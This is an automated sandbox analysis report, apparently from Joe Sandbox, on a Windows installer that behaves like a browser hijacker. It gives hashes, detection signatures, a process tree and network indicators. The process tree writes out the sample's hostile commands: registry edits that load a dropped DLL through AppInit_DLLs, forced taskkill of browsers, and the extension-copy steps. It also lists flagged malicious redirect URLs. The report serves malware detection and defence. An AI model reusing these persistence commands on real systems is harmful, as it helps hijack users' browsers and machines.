Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
$RDGU87D.exe

Overview

General Information

Sample Name:$RDGU87D.exe
Analysis ID:831395
MD5:c91fcaa707b9e46828d867a4d399f6b2
SHA1:eabe1a499a663b74d7b80fd0dec99b103d957697
SHA256:1d180bd0d9a05b4c3883b99fcf9b5502bf30b35b2e09d4ba4ab2111079b3221e
Infos:

Detection

Score:40
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Checks if browser processes are running
Obfuscated command line found
Creates an undocumented autostart registry key
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • $RDGU87D.exe (PID: 1764 cmdline: C:\Users\user\Desktop\$RDGU87D.exe MD5: C91FCAA707B9E46828D867A4D399F6B2)
    • $RDGU87D.tmp (PID: 1184 cmdline: "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" MD5: 4193A1BA05847842590BE08BEC38CC72)
      • $RDGU87D.exe (PID: 1120 cmdline: "C:\Users\user\Desktop\$RDGU87D.exe" /SILENT MD5: C91FCAA707B9E46828D867A4D399F6B2)
        • $RDGU87D.tmp (PID: 2692 cmdline: "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT MD5: 4193A1BA05847842590BE08BEC38CC72)
          • taskkill.exe (PID: 1560 cmdline: "taskkill" /F /IM msedge.exe /T MD5: 3722FA501DCB50AE42818F9034906891)
          • taskkill.exe (PID: 764 cmdline: "taskkill" /F /IM chrome.exe /T MD5: 3722FA501DCB50AE42818F9034906891)
          • taskkill.exe (PID: 1444 cmdline: "taskkill" /F /IM vivaldi.exe /T MD5: 3722FA501DCB50AE42818F9034906891)
          • taskkill.exe (PID: 2128 cmdline: "taskkill" /F /IM opera.exe /T MD5: 3722FA501DCB50AE42818F9034906891)
          • taskkill.exe (PID: 2064 cmdline: "taskkill" /F /IM brave.exe /T MD5: 3722FA501DCB50AE42818F9034906891)
          • cmd.exe (PID: 2672 cmdline: C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • reg.exe (PID: 1544 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
            • reg.exe (PID: 2472 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
          • chrome.exe (PID: 2476 cmdline: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.php MD5: 6ACAE527E744C80997B25EF2A0485D5E)
            • xcopy.exe (PID: 2544 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\uOB9DUdVCp9I" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
            • chrome.exe (PID: 1184 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,578352216204275106,4554941784064420504,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1440 /prefetch:8 MD5: 6ACAE527E744C80997B25EF2A0485D5E)
      • xcopy.exe (PID: 2264 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\17vsRA25JVNi" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
      • conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe "-180126430115798039051631232828-2691859771612897714135344637115556289411055654796" MD5: CE476F23405AADC46039AC13127DF473)
  • xcopy.exe (PID: 1664 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\rY3YrAQjOUXa" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
  • xcopy.exe (PID: 3668 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
  • xcopy.exe (PID: 3860 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
  • xcopy.exe (PID: 3952 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\Odx9a70VBK1g" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
  • xcopy.exe (PID: 1160 cmdline: xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\EqwqqQBb6Hr3" MD5: 20CF8728C55A8743AAC86FB8D30EA898)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: $RDGU87D.exeReversingLabs: Detection: 47%
Source: $RDGU87D.exeVirustotal: Detection: 60%Perma Link
Source: https://searchesmia.com/bingchr4?q=Avira URL Cloud: Label: malware
Source: https://smashaff.com/redirect?&url=Avira URL Cloud: Label: malware
Source: C:\Windows\System32\is-T05I8.tmpReversingLabs: Detection: 42%
Source: C:\Windows\system32\sxsshell.dll (copy)ReversingLabs: Detection: 42%
Source: $RDGU87D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpDirectory created: C:\Program Files\ChromeExtensionJump to behavior
Source: $RDGU87D.exeStatic PE information: certificate valid
Source: $RDGU87D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: archiveint.pdbGCTL source: xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: tar.pdb source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: tar.pdbGCTL source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: archiveint.pdb source: xcopy.exe, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: E:\work\chrome_extension_auto_install\SetupUnpackNewRealFixReload\ExtDll\x64\Release\ext.pdb source: xcopy.exe, 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934166286.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942180233.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979641480.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024700223.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035310663.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068847691.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp
Source: Joe Sandbox ViewIP Address: 141.101.120.11 141.101.120.11
Source: Joe Sandbox ViewIP Address: 38.128.66.115 38.128.66.115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49217
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49207
Source: unknownNetwork traffic detected: HTTP traffic on port 49217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 12:20:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab626bade183826-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.drString found in binary or memory: http://creativecommons.org/ns#
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://ocsps.ssl.com0
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.drString found in binary or memory: http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.drString found in binary or memory: http://www.inkscape.org/)
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.drString found in binary or memory: http://www.inkscape.org/namespaces/inkscape
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: $RDGU87D.exe, 00000001.00000003.922235100.0000000001EB4000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000003.00000003.934356412.0000000001E24000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.com
Source: $RDGU87D.exe, 00000001.00000003.914790721.00000000022D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.com$https://chrome.com$https://chrome.com
Source: $RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.com1R
Source: $RDGU87D.exe, 00000001.00000003.922235100.0000000001EB4000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000003.00000003.934356412.0000000001E24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.com9P
Source: $RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.comiR
Source: $RDGU87D.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, is-R5QFD.tmp.4.dr, background.js.30.dr, background.js.28.dr, background.js.34.dr, background.js.21.dr, background.js.32.dr, background.js.23.drString found in binary or memory: https://searchesmia.com/bingchr4?q=
Source: xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, is-R5QFD.tmp.4.dr, background.js.30.dr, background.js.28.dr, background.js.34.dr, background.js.21.dr, background.js.32.dr, background.js.23.drString found in binary or memory: https://smashaff.com/redirect?&url=
Source: $RDGU87D.tmp, 00000004.00000003.931574561.0000000002046000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com
Source: $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.000000000204D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php
Source: $RDGU87D.tmp, 00000004.00000003.932375476.000000000036B000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php-1
Source: $RDGU87D.tmp, 00000004.00000003.932375476.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.php2F
Source: $RDGU87D.tmp, 00000004.00000003.932595838.00000000002F7000.00000004.00000001.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933214226.00000000002F7000.00000004.00000001.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.000000000204D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpA
Source: $RDGU87D.tmp, 00000004.00000003.932375476.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpL
Source: $RDGU87D.tmp, 00000004.00000003.930369243.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpO
Source: $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.phpl
Source: $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smashbrowser.com/welcome2.url
Source: $RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000000.917581141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, $RDGU87D.tmp.3.drString found in binary or memory: https://www.innosetup.com/
Source: $RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000000.917581141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, $RDGU87D.tmp.3.drString found in binary or memory: https://www.remobjects.com/ps
Source: $RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exeString found in binary or memory: https://www.ssl.com/repository0
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=WP.289365
Source: unknownDNS traffic detected: queries for: ocsps.ssl.com
